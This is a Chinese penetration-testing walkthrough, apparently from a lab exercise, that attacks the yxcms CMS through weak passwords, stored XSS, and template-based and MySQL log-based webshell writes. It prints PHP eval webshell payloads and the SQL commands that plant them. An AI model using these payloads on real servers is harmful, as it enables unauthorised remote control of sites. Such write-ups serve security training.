1、漏洞搜索与利用
漏洞1:后台弱口令
漏洞2:
在yxcms有个留言功能,常常存在存储型xss漏洞
先用<h1>123xss</h1>测试一下会不会解析
登录管理员账号审核留言,发现xss脚本解析了
写入xss弹窗
再次返回管理员审核页面,弹窗成功,存储型xss漏洞一枚
漏洞3:
前台模板可以新增php文件,我们可以尝试写入一句话木马
验证shell文件,可正常执行
使用蚁剑连接
漏洞4:
前面我们已经得到phpmyadmin的弱口令为root/root,且通过phpstudy探针页面知道了网站根目录为C:/phpStudy/WWW, 我们通过MySQL写入shell
1.通过outfile写入shell,新建sql语句
select '<?php @eval($_POST[pass])?>'into outfile 'C:/phpStudy/WWW/shell1.php';
但是报错了
执行以下sql语句
发现没有写入的权限,无法使用select into outfile 方式直接写入shell
2、通过全局日志写入shell
先查看全局日志是否开启
发现全局日志general_log是off关闭的
开启全局日志,并修改日志路径为我们写入shell的路径
set set global general_log = ON
set set global general_log_file = 'C://phpStudy/WWW/yxcms/shell1.php';
接下来写入shell即可
select '<?php @eval($_POST[pass]); ?>';
可以看到shell1.php文件已经存在且一句话也已经被写入日志
蚁剑连接成功
3、使用慢查询日志getsehll
在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用,其参数值有以下三种:
1、NULL:表示不允许导入导出
2、目录地址,如/tmp/:表示只能对指定目录进行导入导出,如/tmp/
3、空,即没有具体值:表示不对导入导出做限制
在高版本的mysql(mysql>5.6.34)中默认为NULL,就是不让导入和导出
使用慢查询日志绕过此限制
先查看慢查询日志开启情况
show variables like '%slow_query_log%';
开启慢日志,设置日志路径为shell路径
set global slow_query_log = ON;
set global slow_query_log_file = 'C://phpStudy/WWW/shell2.php';
使用慢查询日志时,只有当查询时间超过系统时间(默认为10秒)时才会记录在日志中,使用如下语句可查看系统时间:
show global variables like '%long_query_time%';
select '<?php @eval($_POST[pass]);?>' or sleep(11);设置查询时间为11s
接下来用蚁剑连接即可
扫一扫
2452
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
